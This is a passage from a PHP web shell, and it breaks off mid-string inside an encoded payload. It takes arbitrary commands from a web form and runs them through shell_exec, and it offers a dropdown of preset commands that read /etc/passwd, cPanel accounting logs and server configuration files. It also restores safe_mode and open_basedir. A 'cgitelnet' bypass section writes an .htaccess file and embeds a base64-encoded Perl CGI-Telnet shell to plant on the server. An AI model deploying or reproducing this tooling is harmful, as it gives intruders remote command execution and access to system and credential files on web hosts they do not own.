  2055. <b><font color=#00ff00><b><font color="#00ff00">Command  :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
  2056. </form>
  2057. <form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass  :=)  </font></strong><select name="liz0" size="1" class="inputz">
  2058. <option value="cat /etc/passwd">/etc/passwd</option>
  2059. <option value="netstat -an | grep -i listen">netstat</option>
  2060. <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
  2061. <option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
  2062. <option value="cat /etc/hosts">/etc/hosts</option>
  2063. <option value="cat /etc/named.conf">/etc/named.conf</option>
  2064. <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
  2065. </select> <input type="submit" class="inputzbut" value="G&ouml;">
  2066. </form>
  2067. </pre>
  2068. ');
  2069. ini_restore("safe_mode");
  2070. ini_restore("open_basedir");
  2071. $liz0=shell_exec($_POST[baba]);
  2072. $liz0zim=shell_exec($_POST[liz0]);
  2073. $uid=shell_exec('id');
  2074. $server=shell_exec('uname -a');
  2075. echo "<pre><h4>";
  2076.  
  2077. echo $liz0;
  2078. echo $liz0zim;
  2079. echo "</h4></pre>";
  2080.  "</div>"; }
  2081. /////////////////////////////////////////////////////
  2082. elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi')) {
  2083. echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1  Bypass Exploit]==--+ </font></b><br><br>";
  2084.  mkdir('cgitelnet1', 0755);
  2085.     chdir('cgitelnet1');      
  2086.         $kokdosya = ".htaccess";
  2087.         $dosya_adi = "$kokdosya";
  2088.         $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  2089.         $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  2090.  
  2091. AddType application/x-httpd-cgi .cin
  2092.  
  2093. AddHandler cgi-script .cin
  2094. AddHandler cgi-script .cin";    
  2095.         fwrite ( $dosya , $metin ) ;
  2096.         fclose ($dosya);
  2097. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxv